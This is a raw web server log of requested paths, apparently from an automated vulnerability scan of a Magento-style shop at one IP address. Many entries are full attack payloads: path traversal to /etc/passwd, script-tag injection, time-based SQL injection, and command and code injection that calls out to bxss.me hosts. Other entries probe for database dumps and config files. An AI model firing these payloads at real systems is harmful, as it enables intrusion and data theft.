/acc/js/varien/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini.js 1 https://104.36.149.61/
/acc/index.php/install/bxss.me%2ft%2fxss.html%3f%2500/locale/ 1 -
/acc/js/bxss.me%2ft%2fxss.html%3f%2500/adminhtml/giftoptions/ 1 -
/acc'||'/js/mage/adminhtml/giftoptions/ 1 https://104.36.149.61/
/HNAP1/ 1 -
/+CSCOT+/translation-table 1 -
/acc/skin/install'\"()&%25<acx><ScRiPt%20>xIbD(9594)<%2fScRiPt>/default/default/css/reset.css 1 https://104.36.149.61/
/1%20waitfor%20delay%20'0:0:15'%20--%20/js/prototype/prototype.js 1 https://104.36.149.61/
/'.gethostbyname(lc('hituu'.'xjolhlqr8e84c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(82).chr(116).chr(87).'/js/varien/js.js 1 -
///..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\windows/win.ini 1 -
/'.print(md5(31337)).'/js/mage/adminhtml/giftmessage.js 1 -
/acc/index.php/install/wizard/config//./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././ 2 -
/cgi-bin/q8u64b79n3bq 1 https://104.36.149.61/
/104.36.149.61_db.rar 1 -
/composer.lock 1 -
/104.36.149.61.sql.gz 1 -
/\"%3bprint(md5(31337))%3b$a=\"/js/mage/adminhtml/product/ 1 -
/acc\"%20AND%202*3*8=6*8%20AND%20\"2ozY\"=\"2ozY/js/mage/adminhtml/uploader/ 1 https://104.36.149.61/
/acc/bxss.me%2ft%2fxss.html%3f%2500/mage/adminhtml/hash.js 1 -
/'%3bprint(md5(31337))%3b$a='/js/mage/ 1 -
/acc/index.php/install/wizard/..%2f..%2fpackage.json 1 -
/acc'\"()&%25<acx><ScRiPt%20>JGJG(9885)<%2fScRiPt>/js/mage/adminhtml/flexuploader.js 1 https://104.36.149.61/
/CEZHKrXC 1 -
/acc/js/mage/%2fxfs.bxss.me.js 1 -
/bxss.me/js/mage/ 1 https://104.36.149.61/
/uSb6rmaq'%3b%20waitfor%20delay%20'0:0:15'%20--%20/js/prototype/validation.js 1 https://104.36.149.61/
/'+'A'.concat(70-3).concat(22*4).concat(117).concat(76).concat(114).concat(85)+(require'socket'%0aSocket.gethostbyname('hittx'+'kxbwoqeuc6289.bxss.me.')[3].to_s)+'/js/mage/adminhtml/giftmessage.js 1 -
/acc/skin/install/default/default/css/%3b(nslookup%20hitblmsfieefxa9e5b.bxss.me||perl%20-e%20\"gethostbyname('hitblmsfieefxa9e5b.bxss.me')\")|(nslookup%20hitblmsfieefxa9e5b.bxss.me||perl%20-e%20\"gethostbyname('hitblmsfieefxa9e5b.bxss.me')\")&(nslookup%20h 1 -
/owa/auth/y.js 1 -
/response.write(9682307*9029219)/js/varien/js.js 1 -
/acc/index.php/install/wizard//../../../../../../../../etc/passwd 2 -
/acc/js/'\"()&%25<acx><ScRiPt%20>TmT7(9040)<%2fScRiPt>/form.js 1 https://104.36.149.61/
/bxss.me%2ft%2fxss.html%3f%2500/skin/adminhtml/default/ 1 -
/)/js/mage/adminhtml/events.js 1 https://104.36.149.61/
/`(nslookup%20hithqwfjwdyixd5808.bxss.me||perl%20-e%20\"gethostbyname('hithqwfjwdyixd5808.bxss.me')\")`/skin/install/default/ 1 -
/1%00%c0%a7%c0%a2%252527%252522/index.php/install/ 1 https://104.36.149.61/
/${9999111+9999736}/skin/adminhtml/ 1 -
/response.write(9504856*9376755)/js/mage/adminhtml/backup.js 1 -
/acc/skin/install/default/default<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/ 1 -
/acc/skin/install/default/./WEB-INF/web.xml%00.jsp 2 -
/acc/skin/bxss.me%2ft%2fxss.html%3f%2500/default/default/ 1 -
/bxss.me/skin/adminhtml/default/ 1 https://104.36.149.61/
/PMA/main.php 1 -
/api/6/nginx 1 https://104.36.149.61/
/acc/skin/install/default/default/1%00%c0%a7%c0%a2%252527%252522/ie7minus.css 1 https://104.36.149.61/
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/mage/adminhtml/grid.js 1 https://104.36.149.61/
//..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd 1 -
/acc/index.php/install/wizard//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini 2 -
/mysqladmin/main.php 1 -
/acc/index.php/install/wizard/beginPost/../../../../../Gemfile 1 -
/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/skin/adminhtml/ 1 https://104.36.149.61/
/&echo%20krgztc$()\\%20duqkho\\nz^xyu||a%20%23'%20&echo%20krgztc$()\\%20duqkho\\nz^xyu||a%20%23|\"%20&echo%20krgztc$()\\%20duqkho\\nz^xyu||a%20%23/js/prototype/extended_debug.js 1 -
/acc/1some_inexistent_file_with_long_name%00.jpg/mage/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/admin/phpmyadmin/ 1 -
/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/skin/adminhtml/ 1 -
/http://bxss.me/t/fit.txt%3F.jpg/js/prototype/tooltip_manager.js 1 https://104.36.149.61/
/dbdump.rar 1 -
/acc/skin/..%2finstall/default/default/css/boxes.css 1 https://104.36.149.61/
/acc/js/1%00%c0%a7%c0%a2%252527%252522/adminhtml/hash.js 1 https://104.36.149.61/
/'+response.write(9043238*9519677)+'/skin/install/default/default/css/reset.css 1 -
/104_dump.rar 1 -
/acc/index.php/install/..%2f..%2f..%2fGemfile 1 -
/WZlHE0Z2'))%20OR%20195=(SELECT%20195%20FROM%20PG_SLEEP(15))--/index.php/install/wizard/config/ 1 https://104.36.149.61/
/0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z/js/mage/adminhtml/giftmessage.js 1 https://104.36.149.61/
/acc/1%00%c0%a7%c0%a2%252527%252522/prototype/tooltip.js 1 https://104.36.149.61/
/administrator/components/com_jnewsletter/includes/php-ofc-library/ofc_upload_image.php 1 -
/${@print(md5(31337))}\\/js/prototype/tooltip.js 1 -
/acc/skin/install/%2fxfs.bxss.me/default/css/reset.css 1 -
/acc/app/etc/local.xml 1 -
/administrator/components/com_redmystic/chart/php-ofc-library/ofc_upload_image.php 1 -
/acc'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'/js/mage/adminhtml/image.js 1 https://104.36.149.61/
/acc/skin/install/default/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/css/boxes.css 1 -
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/skin/install/default/default/css/ie7minus.css 1 https://104.36.149.61/
/acc\"%20AND%202*3*8=6*8%20AND%20\"Hiq4\"=\"Hiq4/index.php/install/ 1 https://104.36.149.61/
/acc/index.php/..%2f..%2f..%2f..%2fpackage.json 1 -
/$(nslookup%20hitdpufkjbznj6d824.bxss.me||perl%20-e%20\"gethostbyname('hitdpufkjbznj6d824.bxss.me')\")/js/mage/adminhtml/backup.js 1 -
/acc/%3b(nslookup%20hitjdwqwatpmg7df40.bxss.me||perl%20-e%20\"gethostbyname('hitjdwqwatpmg7df40.bxss.me')\")|(nslookup%20hitjdwqwatpmg7df40.bxss.me||perl%20-e%20\"gethostbyname('hitjdwqwatpmg7df40.bxss.me')\")&(nslookup%20hitjdwqwatpmg7df40.bxss.me||perl%2 1 -
/if(now()=sysdate(),sleep(15),0)/js/mage/adminhtml/accordion.js 1 https://104.36.149.61/
/|(nslookup%20hithvdtuqqfrpd90d7.bxss.me||perl%20-e%20\"gethostbyname('hithvdtuqqfrpd90d7.bxss.me')\")/js/mage/adminhtml/sales/ 1 -
/acc/%3b(nslookup%20hitujgeuzejob0fd41.bxss.me||perl%20-e%20\"gethostbyname('hitujgeuzejob0fd41.bxss.me')\")|(nslookup%20hitujgeuzejob0fd41.bxss.me||perl%20-e%20\"gethostbyname('hitujgeuzejob0fd41.bxss.me')\")&(nslookup%20hitujgeuzejob0fd41.bxss.me||perl%2 1 -
/!(()&&!|*|*|/js/prototype/windows/ 1 https://104.36.149.61/
/^(%23$!@%23$)(()))******/js/mage/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/js/../../../../../../../../../../../../../etc/shells 1 -
/acc/skin/install/default/default/'\"()&%25<acx><ScRiPt%20>Ijhk(9475)<%2fScRiPt>/boxes.css 1 https://104.36.149.61/
/acc\"%20AND%202*3*8=6*8%20AND%20\"6GOI\"=\"6GOI/skin/install/default/default/css/ie7minus.css 1 https://104.36.149.61/
/-1%20OR%202+901-901-1=0+0+0+1/skin/install/default/ 1 https://104.36.149.61/
/acc/%3b(nslookup%20hitsnbhlfgesae5ed7.bxss.me||perl%20-e%20\"gethostbyname('hitsnbhlfgesae5ed7.bxss.me')\")|(nslookup%20hitsnbhlfgesae5ed7.bxss.me||perl%20-e%20\"gethostbyname('hitsnbhlfgesae5ed7.bxss.me')\")&(nslookup%20hitsnbhlfgesae5ed7.bxss.me||perl%2 1 -
/acc/js/%3b(nslookup%20hituxdfekfnec1a035.bxss.me||perl%20-e%20\"gethostbyname('hituxdfekfnec1a035.bxss.me')\")|(nslookup%20hituxdfekfnec1a035.bxss.me||perl%20-e%20\"gethostbyname('hituxdfekfnec1a035.bxss.me')\")&(nslookup%20hituxdfekfnec1a035.bxss.me||per 1 -
/acc/js/mage/'\"()&%25<acx><ScRiPt%20>kUNn(9615)<%2fScRiPt>/sales/ 1 https://104.36.149.61/
/'+response.write(9077201*9826036)+'/js/mage/translate.js 1 -
/|echo%20qkfjwm$()\\%20nsgucj\\nz^xyu||a%20%23'%20|echo%20qkfjwm$()\\%20nsgucj\\nz^xyu||a%20%23|\"%20|echo%20qkfjwm$()\\%20nsgucj\\nz^xyu||a%20%23/js/mage/adminhtml/ 1 -
/^(%23$!@%23$)(()))******/js/mage/adminhtml/grid.js 1 https://104.36.149.61/
/ui/vropspluginui/rest/services/getstatus 1 -
/acc/skin/install/.%2fdefault/default/css/boxes.css 1 https://104.36.149.61/
/Http://bxss.me/t/fit.txt/js/mage/adminhtml/browser.js 1 https://104.36.149.61/
/http://bxss.me/t/fit.txt%3F.jpg/skin/install/default/default/css/boxes.css 1 https://104.36.149.61/
/acc/js/mage/bxss.me%2ft%2fxss.html%3f%2500.js 1 -
/WcUEuNsq'%3b%20waitfor%20delay%20'0:0:15'%20--%20/js/prototype/tooltip_manager.js 1 https://104.36.149.61/
/acc/js/mage/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/form.js 1 https://104.36.149.61/
/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/skin/install/default/ 1 -
/'+response.write(9675169*9907866)+'/index.php/install/wizard/config/ 1 -
/WEB-INF.rar 1 -
/cgi-bin/application.wadl 1 -
/%3bassert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))%3b/index.php/install/ 1 -
/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/js/mage/adminhtml/uploader/ 1 https://104.36.149.61/
/<!--/skin/install/default/default/ 1 -
/Http://bxss.me/t/fit.txt/skin/install/default/default/css/clears.css 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/skin/install/default/default/css/iestyles.css 1 https://104.36.149.61/
/1'\"/js/mage/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/debug.js 1 https://104.36.149.61/
/$(nslookup%20hitwyijsikhue6ebaa.bxss.me||perl%20-e%20\"gethostbyname('hitwyijsikhue6ebaa.bxss.me')\")/js/mage/adminhtml/grid.js 1 -
/acc/js/prototype/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/themes/ 1 -
/../../package-lock.json 1 -
/acc/index.php/.%2finstall/ 1 https://104.36.149.61/
/acc/skin/%2fxfs.bxss.me/default/default/ 1 -
/jvyr0ehozmbg.html 1 https://104.36.149.61/
//js/mage/adminhtml/product/ 1 https://104.36.149.61/
/acc/index.php/install//../../../../../../../../boot.ini 1 -
/${@print(md5(31337))}\\/skin/install/default/default/ 1 -
/if(now()=sysdate(),sleep(15),0)/skin/install/default/default/css/reset.css 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2fpackage-lock.json 1 -
/%3b(nslookup%20hityahilsojwweb1cf.bxss.me||perl%20-e%20\"gethostbyname('hityahilsojwweb1cf.bxss.me')\")|(nslookup%20hityahilsojwweb1cf.bxss.me||perl%20-e%20\"gethostbyname('hityahilsojwweb1cf.bxss.me')\")&(nslookup%20hityahilsojwweb1cf.bxss.me||perl%20-e% 1 -
/acc9551651/skin/install/default/default/css/ie7minus.css 1 https://104.36.149.61/
/cgi-bin//.. 1 -
/if(now()=sysdate(),sleep(15),0)/js/prototype/windows/themes/ 1 https://104.36.149.61/
/cgi-bin/./WEB-INF/web.xml%00.jsp 2 -
//xmlrpc 1 -
/acc/skin/install/default/'\"()&%25<acx><ScRiPt%20>Lssw(9406)<%2fScRiPt>/ 1 https://104.36.149.61/
/acc/1%00%c0%a7%c0%a2%252527%252522/mage/adminhtml/uploader/ 1 https://104.36.149.61/
/assets/components/phpthumb/phpThumb.php 1 -
/dbdump.tgz 1 -
/bxss.me%2ft%2fxss.html%3f%2500/js/mage/ 1 -
/!(()&&!|*|*|/skin/install/default/default/css/ie7minus.css 1 https://104.36.149.61/
/contrib/extjs//examples/feed-viewer/feed-proxy.php 1 -
/acc/js/%2fxfs.bxss.me/debug.js 1 -
/acc/skin/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/default/default/ 1 -
/'+response.write(9277672*9056875)+'/js/prototype/windows/ 1 -
/bxss.me%2ft%2fxss.html%3f%2500/skin/install/default/default/css/boxes.css 1 -
/'\"()&%25<acx><ScRiPt%20>fBHE(9963)<%2fScRiPt>/js/prototype/extended_debug.js 1 https://104.36.149.61/
/@@v5laA/js/prototype/tooltip.js 1 https://104.36.149.61/
/acc/js/varien/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f.js 1 https://104.36.149.61/
/http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg/js/prototype/extended_debug.js 1 https://104.36.149.61/
/<!--/skin/install/default/default/css/ie7minus.css 1 -
/acc/js/%3b(nslookup%20hitirljcfnxmgd9d18.bxss.me||perl%20-e%20\"gethostbyname('hitirljcfnxmgd9d18.bxss.me')\")|(nslookup%20hitirljcfnxmgd9d18.bxss.me||perl%20-e%20\"gethostbyname('hitirljcfnxmgd9d18.bxss.me')\")&(nslookup%20hitirljcfnxmgd9d18.bxss.me||per 1 -
/http://bxss.me/t/fit.txt%3F.jpg/js/prototype/windows/ 1 https://104.36.149.61/
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/adminhtml/grid.js 1 https://104.36.149.61/
/acc/..%2fjs/mage/adminhtml/form.js 1 https://104.36.149.61/
/acc'||'/js/mage/adminhtml/image.js 1 https://104.36.149.61/
/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/skin/install/default/default/css/ie7minus.css 1 -
/&(nslookup%20hitayuxgspoihe673f.bxss.me||perl%20-e%20\"gethostbyname('hitayuxgspoihe673f.bxss.me')\")&'\\\"`0&(nslookup%20hitayuxgspoihe673f.bxss.me||perl%20-e%20\"gethostbyname('hitayuxgspoihe673f.bxss.me')\")&`'/js/prototype/debug.js 1 -
/..%2facc/index.php/install/wizard/locale/ 1 https://104.36.149.61/
/.bower.json 1 -
/&(nslookup%20hitvdmpdjnhzoceaa8.bxss.me||perl%20-e%20\"gethostbyname('hitvdmpdjnhzoceaa8.bxss.me')\")&'\\\"`0&(nslookup%20hitvdmpdjnhzoceaa8.bxss.me||perl%20-e%20\"gethostbyname('hitvdmpdjnhzoceaa8.bxss.me')\")&`'/skin/install/default/default/css/ie7minus 1 -
/!(()&&!|*|*|/js/mage/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/&(nslookup%20hitdgrtrwfjvv0c947.bxss.me||perl%20-e%20\"gethostbyname('hitdgrtrwfjvv0c947.bxss.me')\")&'\\\"`0&(nslookup%20hitdgrtrwfjvv0c947.bxss.me||perl%20-e%20\"gethostbyname('hitdgrtrwfjvv0c947.bxss.me')\")&`'/skin/adminhtml/default/ 1 -
/%2fxfs.bxss.me/js/mage/ 1 -
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/js/mage/adminhtml/image.js 1 https://104.36.149.61/
/|echo%20ochkwg$()\\%20kumtxo\\nz^xyu||a%20%23'%20|echo%20ochkwg$()\\%20kumtxo\\nz^xyu||a%20%23|\"%20|echo%20ochkwg$()\\%20kumtxo\\nz^xyu||a%20%23/js/mage/adminhtml/grid.js 1 -
/&echo%20mzxohn$()\\%20wazuml\\nz^xyu||a%20%23'%20&echo%20mzxohn$()\\%20wazuml\\nz^xyu||a%20%23|\"%20&echo%20mzxohn$()\\%20wazuml\\nz^xyu||a%20%23/js/varien/js.js 1 -
/acc/js/mage/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/browser.js 1 https://104.36.149.61/
/<!--/js/varien/form.js 1 -
/&echo%20tnidit$()\\%20tjygtd\\nz^xyu||a%20%23'%20&echo%20tnidit$()\\%20tjygtd\\nz^xyu||a%20%23|\"%20&echo%20tnidit$()\\%20tjygtd\\nz^xyu||a%20%23/js/mage/adminhtml/events.js 1 -
/acc/js/mage/'\"()&%25<acx><ScRiPt%20>IUUR(9876)<%2fScRiPt>/giftmessage.js 1 https://104.36.149.61/
/0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z/js/scriptaculous/effects.js 1 https://104.36.149.61/
/acc/index.php/install/wizard/locale//../../../../../../../../etc/passwd 2 -
/acc/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/mage/translate.js 1 -
//%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/windows/win.ini 1 -
/1%20waitfor%20delay%20'0:0:15'%20--%20/skin/install/default/default/css/reset.css 1 https://104.36.149.61/
/jmx-console/HtmlAdaptor 3 -
/acc/js/prototype/prototype<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>.js 1 -
//settings.php 1 -
/acc/1%00%c0%a7%c0%a2%252527%252522/mage/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/admin/js/tiny_mce 1 -
/acc/js/%2fxfs.bxss.me/adminhtml/product/ 1 -
/-1%20OR%202+984-984-1=0+0+0+1/skin/install/default/default/css/iestyles.css 1 https://104.36.149.61/
/1some_inexistent_file_with_long_name%00.jpg/js/prototype/windows/ 1 https://104.36.149.61/
/acc/js/'\"()&%25<acx><ScRiPt%20>kUNn(9685)<%2fScRiPt>/adminhtml/sales/ 1 https://104.36.149.61/
/'.print(md5(31337)).'/js/mage/adminhtml/flexuploader.js 1 -
/acc/%2fxfs.bxss.me/prototype/windows/themes/ 1 -
/\"%3bprint(md5(31337))%3b$a=\"/js/mage/adminhtml/events.js 1 -
/acc'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'/js/prototype/tooltip_manager.js 1 https://104.36.149.61/
/'.gethostbyname(lc('hitaa'.'mqtvaqlwba053.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(89).chr(103).chr(87).'/index.php/install/wizard/config/ 1 -
/acc/1some_inexistent_file_with_long_name%00.jpg/frontend/ 1 https://104.36.149.61/
/acc/index.php/install/wizard/locale/..%2f..%2f..%2f..%2fpackage-lock.json 1 -
/${@print(md5(31337))}\\/index.php/install/ 1 -
/\"+response.write(9582389*9888668)+\"/js/mage/adminhtml/browser.js 1 -
/1%00%c0%a7%c0%a2%252527%252522/js/mage/adminhtml/flexuploader.js 1 https://104.36.149.61/
/sitemap.xml 12 -
/'\"()&%25<acx><ScRiPt%20>bt2L(9616)<%2fScRiPt>/js/mage/adminhtml/hash.js 1 https://104.36.149.61/
/Http://bxss.me/t/fit.txt/js/mage/adminhtml/sales/ 1 https://104.36.149.61/
/acc/index.php/install/wizard/locale/..%2f..%2f..%2f..%2fweb.config 1 -
//js/prototype/ 1 https://104.36.149.61/
/acc/1%00%c0%a7%c0%a2%252527%252522/prototype/debug.js 1 https://104.36.149.61/
/'\"()&%25<acx><ScRiPt%20>WvSu(9384)<%2fScRiPt>/js/mage/adminhtml/events.js 1 https://104.36.149.61/
/0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z/js/prototype/validation.js 1 https://104.36.149.61/
/owa/auth/x.js 31 -
/|(nslookup%20hitrvlqhwxxuv1a6b2.bxss.me||perl%20-e%20\"gethostbyname('hitrvlqhwxxuv1a6b2.bxss.me')\")/js/prototype/debug.js 1 -
/'+'A'.concat(70-3).concat(22*4).concat(105).concat(76).concat(121).concat(86)+(require'socket'%0aSocket.gethostbyname('hitko'+'dxotgkmp1baf3.bxss.me.')[3].to_s)+'/js/mage/translate.js 1 -
/acc/js/varien/1some_inexistent_file_with_long_name%00.jpg.js 1 https://104.36.149.61/
/zp-core/zp-extensions/tiny_mce 1 -
//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd 1 -
/acc/index.php/..%2f..%2f..%2f..%2fpackage-lock.json 1 -
/libs/phpThumb/phpThumb.php 1 -
//%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae//etc/passwd 1 -
/'%3bprint(md5(31337))%3b$a='/skin/install/default/ 1 -
/authenticationendpoint/langs.jsp 1 -
/acc/bxss.me%2ft%2fxss.html%3f%2500/mage/adminhtml/uploader/ 1 -
/acc/js'\"()&%25<acx><ScRiPt%20>JGJG(9521)<%2fScRiPt>/mage/adminhtml/flexuploader.js 1 https://104.36.149.61/
/104-dump.sql 1 -
/ymTJgjVj'%3b%20waitfor%20delay%20'0:0:15'%20--%20/js/mage/adminhtml/events.js 1 https://104.36.149.61/
/<!--/js/mage/adminhtml/ 1 -
/1some_inexistent_file_with_long_name%00.jpg/js/mage/adminhtml/image.js 1 https://104.36.149.61/
/sftp-config.json 1 -
/\".gethostbyname(lc(\"hitnv\".\"mcejujor4473a.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(104).chr(87).chr(102).chr(77).\"/js/mage/adminhtml/uploader/ 1 -
/'.print(md5(31337)).'/js/mage/translate.js 1 -
/acc/js/mage/%3b(nslookup%20hitytfanlzepr376a6.bxss.me||perl%20-e%20\"gethostbyname('hitytfanlzepr376a6.bxss.me')\")|(nslookup%20hitytfanlzepr376a6.bxss.me||perl%20-e%20\"gethostbyname('hitytfanlzepr376a6.bxss.me')\")&(nslookup%20hitytfanlzepr376a6.bxss.me 1 -
/acc/js/.%2fmage/ 1 https://104.36.149.61/
/)/index.php/install/wizard/config/ 1 https://104.36.149.61/
/acc/js/mage/adminhtml/events.js/923108%40 1 https://104.36.149.61/
/1%20waitfor%20delay%20'0:0:15'%20--%20/js/mage/adminhtml/flexuploader.js 1 https://104.36.149.61/
/2the2OPr/skin/adminhtml/ 1 https://104.36.149.61/
/MiQB6cbO/js/mage/adminhtml/accordion.js 1 https://104.36.149.61/
/acc%25'%20AND%202*3*8=6*8%20AND%20'HQWE'!='HQWE%25/js/mage/adminhtml/form.js 1 https://104.36.149.61/
/'\"()&%25<acx><ScRiPt%20>TmT7(9323)<%2fScRiPt>/js/varien/form.js 1 https://104.36.149.61/
/9rJnKMJE/js/prototype/extended_debug.js 1 https://104.36.149.61/
/http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg/js/mage/adminhtml/flexuploader.js 1 https://104.36.149.61/
/'\"()&%25<acx><ScRiPt%20>ZcmW(9670)<%2fScRiPt>/js/mage/adminhtml/grid.js 1 https://104.36.149.61/
/backup-104.tar 1 -
/acc/index.php/install/wizard/locale//../../../WEB-INF/web.xml%00.jsp 1 -
/&echo%20pepkbr$()\\%20uptkak\\nz^xyu||a%20%23'%20&echo%20pepkbr$()\\%20uptkak\\nz^xyu||a%20%23|\"%20&echo%20pepkbr$()\\%20uptkak\\nz^xyu||a%20%23/js/prototype/ 1 -
/JgEeztBH')%20OR%20407=(SELECT%20407%20FROM%20PG_SLEEP(15))--/js/mage/adminhtml/sales/ 1 https://104.36.149.61/
/^(%23$!@%23$)(()))******/js/mage/adminhtml/ 1 https://104.36.149.61/
/'+response.write(9777240*9340419)+'/index.php/install/wizard/locale/ 1 -
/acc/js/1%00%c0%a7%c0%a2%252527%252522/adminhtml/image.js 1 https://104.36.149.61/
/acc/'\"()&%25<acx><ScRiPt%20>mwZT(9268)<%2fScRiPt>/mage/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/acc/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/mage/adminhtml/form.js 1 https://104.36.149.61/
/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/js/mage/ 1 https://104.36.149.61/
/acc/index.php/install//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini 2 -
/acc/js/prototype/windows/..%2fthemes/ 1 https://104.36.149.61/
/'\"/skin/adminhtml/default/ 1 -
/NCdmKiAS/skin/install/default/default/css/clears.css 1 https://104.36.149.61/
/0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z/js/prototype/windows/themes/ 1 https://104.36.149.61/
/acc/index.php/install/..%2fGemfile 1 -
/acc/%2fxfs.bxss.me/mage/adminhtml/giftmessage.js 1 -
/$(nslookup%20hitmwopokxlgd03bc8.bxss.me||perl%20-e%20\"gethostbyname('hitmwopokxlgd03bc8.bxss.me')\")/js/scriptaculous/effects.js 1 -
/acc/1some_inexistent_file_with_long_name%00.jpg/adminhtml/ 1 https://104.36.149.61/
/%2fxfs.bxss.me/js/prototype/prototype.js 1 -
/acc/index.php/..%2finstall/ 1 https://104.36.149.61/
/acc%25'%20AND%202*3*8=6*8%20AND%20'mNmG'!='mNmG%25/index.php/install/ 1 https://104.36.149.61/
/acc/js/mage/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/browser.js 1 https://104.36.149.61/
//../../../../../../../../../../../../../../../..//etc/passwd 1 -
/acc\"%20AND%202*3*8=6*8%20AND%20\"y7Dc\"=\"y7Dc/js/mage/translate.js 1 https://104.36.149.61/
/acc/index.php/..%2f..%2fweb.config 1 -
/acc/skin/.%2finstall/default/default/css/ie7minus.css 1 https://104.36.149.61/
/Http://bxss.me/t/fit.txt/js/mage/translate.js 1 https://104.36.149.61/
/acc/index.php/install/wizard//../../../WEB-INF/web.xml%00.jsp 1 -
/acc/js/varien/js.js/953496%40 1 https://104.36.149.61/
/'+'A'.concat(70-3).concat(22*4).concat(117).concat(71).concat(98).concat(85)+(require'socket'%0aSocket.gethostbyname('hitag'+'mcsitdza2f9e3.bxss.me.')[3].to_s)+'/js/prototype/tooltip_manager.js 1 -
/users/sign_in 2 -
/acc/index.php//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 2 -
/'+'A'.concat(70-3).concat(22*4).concat(105).concat(86).concat(118).concat(66)+(require'socket'%0aSocket.gethostbyname('hitaa'+'iedilqzlb859a.bxss.me.')[3].to_s)+'/skin/adminhtml/ 1 -
/`(nslookup%20hitmkzduhgyvw94a03.bxss.me||perl%20-e%20\"gethostbyname('hitmkzduhgyvw94a03.bxss.me')\")`/js/prototype/validation.js 1 -
/104_database.tgz 1 -
/'%3bprint(md5(31337))%3b$a='/js/mage/adminhtml/image.js 1 -
/cgi-bin/config.rb 1 -
/uofRFyBR')%20OR%20419=(SELECT%20419%20FROM%20PG_SLEEP(15))--/js/varien/form.js 1 https://104.36.149.61/
